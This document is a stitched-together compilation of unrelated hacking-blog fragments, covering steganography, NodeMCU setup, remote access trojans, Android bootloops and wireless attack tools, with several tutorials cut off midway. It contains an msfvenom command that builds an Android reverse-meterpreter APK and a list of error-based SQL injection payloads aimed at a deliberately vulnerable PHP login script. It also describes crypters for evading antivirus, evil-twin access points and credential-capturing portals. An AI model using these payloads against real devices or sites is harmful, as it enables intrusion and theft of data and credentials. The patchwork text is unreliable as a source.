

Video steganography hides chunks of secret information inside video sequences. The high capacity and complex structure of video sequences make them preferable as cover media over other media such as image, text, or audio. Video steganography is a prominent and evolving field in the information security domain, and a significant number of video steganography methods have been proposed in recent years. This article provides a comprehensive review of video steganography methods proposed in the literature.


How to Hide File Behind Video (Steganography)

 


NodeMCU ESP8266

 





NodeMCU ESP8266 Development Kit is based on the ESP-12E Wi-Fi module. It includes an onboard FTDI serial programmer and a 3.3V regulator to power the ESP-12E module.

It is a sort of plug-and-play module. Just plug in a USB cable, program the Wi-Fi module, and you are good to go.


NodeMCU ESP8266 Datasheet

  • Microcontroller: Tensilica 32-bit RISC CPU Xtensa LX106
  • Operating Voltage: 3.3V
  • Input Voltage: 7-12V
  • Digital I/O Pins (DIO): 16
  • Analog Input Pins (ADC): 1
  • UARTs: 1
  • SPIs: 1
  • I2Cs: 1
  • Flash Memory: 4 MB
  • SRAM: 64 KB
  • Clock Speed: 80 MHz
  • USB-TTL based on CP2102 is included onboard, Enabling Plug n Play
  • PCB Antenna
  • Small Sized module to fit smartly inside your IoT projects
  • Wi-Fi: Built-in 802.11 b/g/n

Now that’s all said and done, let’s move on to actually programming the NodeMCU ESP8266 board using the Arduino IDE.

Material Needed

For this tutorial, we will be flashing the onboard LED of the NodeMCU ESP8266 dev kit. So, let’s gear up:

  • A PC/Laptop running Windows/Linux
  • USB Type-A to Micro-B Cable
  • NodeMCU ESP8266-12E DevKit

ESP8266 with Arduino IDE

Given the popularity of the Arduino microcontroller, the simplest way to program the NodeMCU ESP8266 Dev Kit is via the Arduino IDE.

Since the Arduino IDE can be used on both Windows and Linux, I will explain the steps to program the ESP8266 on both operating systems.

STEP 1: Install CP2102 Driver

For Windows:

NodeMCU ESP8266-12E module contains an FTDI Serial Programmer. To use this programmer, you need to download and install the CP210x USB to UART Bridge VCP Driver from the official website of SilLabs:



Open Source Rats

A remote access trojan (RAT, sometimes called creepware) is a type of malware that controls a system through a remote network connection. While desktop sharing and remote administration have many legal uses, “RAT” connotes criminal or malicious activity. A RAT is typically installed without the victim’s knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software and other anti-virus software. – Wikipedia




On many underground forums there are a lot of offers for RATs. Some are cheap and some are really expensive. Some of them are sold as a service with a monthly/yearly subscription. In most cases they do the same thing. Here are some example features:


  • Task Manager
  • File Manager
  • Startup Manager
  • Remote Desktop
  • Remote Shell
  • Remote Execution
  • System Information
  • Registry Editor
  • System Power Commands (Restart, Shutdown, Standby)
  • Keylogger (Unicode Support)
  • Reverse Proxy (SOCKS5)
  • Password Recovery (Common Browsers and FTP Clients)
  • Clipboard Text



RATs are typically client-server programs. The server part is located on the hacker's computer/server and the client part is installed on the victim's computer. On the server, we can view the list of infected clients, manage them, and perform all the functions offered by the RAT.


In the server software you have the option to build a client with all your parameters, such as server address, process name, an option to detect virtual environments and sandboxes, etc. Some RATs also offer crypters and binders. Crypters and binders can also be found as separate software.


A crypter is software used to hide malware so that it is not easily detected by antivirus software. To do this, it can use encryption techniques and sometimes obfuscation. The crypter takes the executable file and produces a new executable file which, when run, decrypts the encrypted code it contains and recovers the original executable file.


File binders are utility software that allow a user to “bind” multiple files together, resulting in a single executable. For example, you can merge your encrypted client file with a 7zip installation file, an image, a sound file, etc.


RATs are written in various programming languages, offer different functions and are prepared for specific platforms.





 


Step by step Tutorial

Generating a Payload with msfvenom

First, fire up Kali Linux so that we can generate an apk file as a malicious payload. We need to check our local IP, which turns out to be ‘192.168.0.112’. You can also hack an Android device through the Internet by using your public/external IP in LHOST and by port forwarding.



After getting your local host IP, use the msfvenom tool, which will generate a payload to penetrate the Android device. Type the command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R> /var/www/html/ehacking.apk


  • -p indicates the payload type
  • android/meterpreter/reverse_tcp specifies that a reverse meterpreter shell will come in from the target Android device
  • LHOST is your local IP
  • LPORT is the listening port
  • R> /var/www/html writes the output directly to the Apache server
  • apk is the name of the final output

This will take some time and generates an apk file of almost ten thousand bytes.





Write an XSS Cookie Stealer in JavaScript to Steal Passwords


JavaScript is one of the most common languages used on the web. It can automate and animate website components, manage website content, and carry out many other useful functions from within a webpage. The scripting language also has many functions which can be used for malicious purposes, including stealing a user's cookies containing passwords and other information.

Cookies are information which a website requests or maintains regarding specific users which visit the page. These cookies contain information about how and when they visit, as well as authentication information for the site such as usernames and passwords. As these cookies must be in use whenever a visitor is active on a given website, an attacker who can intercept them can steal this information and use it to impersonate or catalog information about specific users.

It's possible to use JavaScript to save or modify a user's cookies for a given domain. While this is usually applied to create and use cookies for interactive web development, if an attacker is able to maliciously view the same cookies, it becomes a valuable hacking technique. JavaScript-based attacks are especially effective when combined with tactics like code injection, as it allows malicious code to be executed on what appears to be an otherwise trusted website.

While we don't advocate stealing anyone's passwords, this guide is a must-know topic for any pentester or IT security professional to understand. If you don't know how black hat hackers do things, you'll never be able to catch them.

Creating an HTML Test Page

In order to steal cookies, a cookie must first be available on the web domain the user is viewing. This happens whenever the user views the website. While it's absolutely possible to inject JavaScript into websites using a man-in-the-middle attack, or by exploiting a vulnerable website, both of these would require additional effort to implement.

The test environment for our cookie will be within a fairly standard HTML index page. We will be able to embed all of our JavaScript elements inline. First, create a new directory to contain the HTML file. On a Linux or macOS system, we can use mkdir, as seen below.




Dumping Database From Login Form

The trick has already been discussed in earlier tutorials; a deep knowledge of those injections is enough to collect data from a login form. But for the purpose of this tutorial, and to open your mind towards this exploitation, we discuss here how to collect data from a login form.





First of all, there are three ways of obtaining data from login forms.

1. XPath Injection

2. Sub Query Injection

3. Blind Injection (both techniques)


I strongly suggest you read them all, as I won't be discussing these injections in detail here. We will discuss only some minor changes to the injection; everything else remains the same.


As with bypassing a login form with SQL injection, we will take a vulnerable login script and start exploring it.


// Deliberately vulnerable login script: both POST values go into the SQL string unescaped.
$uname=$_POST['uname'];
$passwrd=$_POST['passwrd'];
$query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";
$result=mysql_query($query);
$rows = mysql_fetch_array($result);
// Any returned row is treated as a successful login.
if($rows)
{
    echo "You have Logged in successfully";
    create_session();
}
else
{
    echo "Better Luck Next time";
}


Query

select username,pass from users where username='$uname' and password='$passwrd' limit 0,1

Injection

username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''='
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) and ""="
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --+
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --+
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) #
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) #
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --


You can leave the password field empty. If the page is actually vulnerable, then one of the above will surely work and we will continue with that one. Now let's see what query is passed. For the query given above, the first injection will work.




Wireless Network Adapter Supports Monitor Mode & Packet Injection




  • Atheros AR9271: The Alfa AWUS036NHA is my favorite long-range network adapter and the standard by which I judge other long-range adapters. It's stable, fast, and a well-supported b/g/n wireless network adapter. There's also the TP-Link TL-WN722N, a favorite for newbies and experienced hackers alike. It's a compact b/g/n adapter that has one of the cheapest prices but boasts surprisingly impressive performance. That being said, only v1 will work with Kali Linux since v2 uses a different chipset.
  • Ralink RT3070: This chipset resides inside a number of popular wireless network adapters. Of those, the Alfa AWUS036NH is a b/g/n adapter with an absurd amount of range. It can be amplified by the omnidirectional antenna and can be paired with a Yagi or Paddle antenna to create a directional array. For a more discreet wireless adapter that can be plugged in via USB, the Alfa AWUS036NEH is a powerful b/g/n adapter that's slim and doesn't require a USB cable to use. It has the added advantage of retaining its swappable antenna. If you need a stealthier option that doesn't look like it could hack anything, you might consider the g/n Panda PAU05. While small, it's a low profile adapter with a strong performance in the short and medium range, a reduced range for when you want to gather network data without including everything within several blocks.
  • Ralink RT3572: While the previous adapters have been 2.4 GHz only, the Alfa AWUS051NH v2 is a dual-band adapter that is also compatible with 5 GHz networks. While slightly pricier, the dual-band capacity and compatibility with 802.11n draft 3.0 and 802.11a/b/g wireless standards make this a more advanced option.
  • Realtek 8187L (Wireless G adapters): The Alfa AWUS036H USB 2.4 GHz adapters use this older chipset that is less useful and will not pick up as many networks. These cards still will work against some networks, thus are great for beginners, as there are a ton around for cheap.
  • Realtek RTL8812AU: Supported in 2017, the Alfa AWUS036ACH is a beast, with dual antennas and 802.11ac and a, b, g, n compatibility with 300 Mbps at 2.4 GHz and 867 Mbps at 5 GHz. It's one of the newest offerings that are compatible with Kali, so if you're looking for the fastest and longest range, this would be an adapter to consider. To use it, you may need to first run "apt update" followed by "apt install realtek-rtl88xxau-dkms" which will install the needed drivers to enable packet injection.



How to Fix Bootloop Issue on Android

 




We’ve recently acquired one of the Nexus 6P phones that “died” and ended up in a bootloop, and we decided to restore it. A bootloop is usually attributed to a hardware issue (dead cores, connector issues, etc.) or a software issue (e.g. corrupt files) that causes the device (e.g. a cellphone) to [re]boot but fail to do so every time. There are some suggestions you can try:

– Soft Reset Android : Turn off the phone, remove the battery and wait for 5-10 minutes before powering it on
– Factory Reset : Wipe everything, go into recovery mode and start everything from scratch
– Use a custom recovery like CWM (ClockworkMod) or TWRP (Team Win Recovery Project)

Here we’re going to roughly cover a recovery via TWRP, using as an example a Nexus 6P cellphone with the bootloop issue. Before we continue, we’ll list a few things you might need:

– EX4_1_1_4Cores.zip : Elemental X kernel V4.11 for Android 7.1.2, modified to use only 4 cores. The EX kernel is faster, and you can easily overclock the little cluster to achieve more performance
– N2G48B_4Cores.img : boot.img from the latest 7.1.2 firmware (modified to use only 4 cores)

Bootloop Issue on Nexus 6P

The phone wouldn’t boot. Trying to go into recovery mode didn’t yield any results. It was stuck on some “no command” / android dead icon (either static or blinking/flashing).




 

Cain and Abel: Well-Known Password Recovery Tool







Cain and Abel is a very powerful and well-known tool for password cracking and password recovery. According to the official website, it runs on Windows operating systems. It allows its users to recover passwords of various types by sniffing, brute-forcing, cracking encrypted passwords, etc.

Cain and Abel: Password Cracking & Password Recovery Tool

Cain and Abel is a tool built for Windows to recover various kinds of passwords. It uses various techniques to recover passwords, such as cracking encrypted passwords through dictionary and brute-force attacks, sniffing the network, recovering keys of wireless networks, cryptanalysis attacks, recording VoIP, decoding scrambled passwords, revealing password boxes, examining routing protocols and revealing cached passwords. Cryptanalysis attacks are performed using rainbow tables. Rainbow tables are generated with the program winrtgen.exe provided in the Cain and Abel package.



It was developed to help people who have lost their credentials. This password cracking and password recovery tool is very helpful for network administrators, teachers, penetration testers, forensic departments, security software companies and security professionals.

Features:

  • Protected storage password manager
  • LSA Secrets Dumper
  • Service Manager
  • Route Table Manager
  • MAC Address Scanner with OUI fingerprint
  • Dialup Password Decoder
  • Full HTTPS sessions sniffer for APR
  • Full LDAPS sessions sniffer for APR
  • Wireless Scanner
  • WEP Cracking
  • ARP Spoofing
  • Network Password Sniffer
  • Password Crackers
  • And much more

Supported Platforms:

  • Windows

Requirements:

To install it, the following system requirements are needed.

  • 10MB hard disk space at least
  • Microsoft Windows 2000/2003/XP/Vista
  • Winpcap Packet Driver and Airpcap Packet Driver

Install Cain and Abel

First, you need to download Cain and Abel. To download it, click on the “download” button below.

Now you can install it by running the self-installing package.









Framework For Wireless Pentesting – SniffAir

 





Introduction

SniffAir is an open-source wireless security framework which allows you to collect, manage and analyze wireless traffic. It also provides the ability to perform sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws or malicious traffic.


SniffAir: Open-source Wireless Security Framework

Along with the prebuilt queries, SniffAir allows you to create custom queries for analyzing the wireless data, which is stored in the SQL database. These queries extract data for wireless penetration test reports. The data can also be leveraged in setting up the wireless attacks included in SniffAir as modules. It can perform automated brute-forcing on EAP and PSK networks, fake portal based phishing attacks, evil twin attacks, etc.


SniffAir Modules:

  • Auto EAP – Automated Brute-Force Login Attack Against EAP Networks
  • Auto PSK – Automated Brute-Force Passphrase Attack Against PSK Networks
  • AP Hunter – Discover Access Points Within a Certain Range Using a Specific Type of Encryption
  • Captive Portal – Web Based Login Portal to Capture User Entered Credentials (Runs as an OPEN Network)
  • Certificate Generator – Generates a Certificate Used by Evil Twin Attacks
  • Exporter – Exports Data Stored in a Workspace to a CSV File
  • Evil Twin – Creates a Fake Access Point, Clients Connect to Divulging MSCHAP Hashes or Cleartext Passwords
  • Handshaker – Parses Database or .pcapdump Files Extracting the Pre-Shared Handshake for Password Guessing (Hashcat or JTR Format)
  • Mac Changer – Changes The Mac Address of an Interface
  • Probe Packet – Sends Out Deauth Packets Targeting SSID(s)
  • Proof Packet – Parses Database or .pcapdump Files Extracting all Packets Related to the Inscope SSIDs
  • Hidden SSID – Discovers the Names of HIDDEN SSIDs
  • Suspicious AP – Looks for Access Points that: Are On a Different Channel, Use a Different Vendor or Encryption Type Than the Rest of The Network
  • Wigle Search SSID – Queries wigle for SSID (i.e. Bob’s wifi)
  • Wigle Search MAC – Queries wigle for all observations of a single mac address


Install

SniffAir was developed with Python 2.7. Tested and supported on:

Clone it from the github repo:

$ git clone https://github.com/Tylous/SniffAir.git

To install, run the following:

$ ./setup.sh

Usage

To run SniffAir:

$ ./SniffAir.py

Type help to list available commands:









Ehtools: Entynet Hacker Tools


With the popularity and number of Wi-Fi tools increasing among beginners, Ehtools is a framework which allows the user to easily access these tools from a single platform. The simple but powerful tool can be used for a wide range of functions from installing new add-ons to viewing information about the target. Lastly, it is easy to install and run.

Features:

  • More than 58 tools included within this framework
  • Automation and streamlining of processes saves valuable time for even the most experienced penetration tester
  • Option to upgrade to the ‘PRO’ version
  • Simple UI for easy navigation
  • Ability to install tools depending on the user’s requirements
  • Range of functions, from attacking Wi-Fi networks and remote access to website attack tools
  • Renowned tools ‘Metasploit’ and ‘Wireshark’ are included

Ehtools Utilities:

ehtmod

– Ehtools Modules: a utility that adds permissions or the ability to control the Framework modules.

ehtkey

– Ehtools key: a utility that allows you to change your config key (ehtools config/boot key) and rewrite /etc/ehtools/.config.

ehtapp

– Ehtools application: a utility that allows you to configure the application, for example creating a desktop application.

epasswd

– Ehtools password changer: a utility that allows you to change your login and pass or ehtools root

Supported Platforms:

Requirements:

  • Full root access

Install

Clone the GitHub repo: git clone https://github.com/entynetproject/ehtools.git


Navigate to the working directory and install the requirements:

$ cd ehtools
$ chmod +x install.sh
$ ./install.sh

Usage

Enter the following command:

$ ehtools

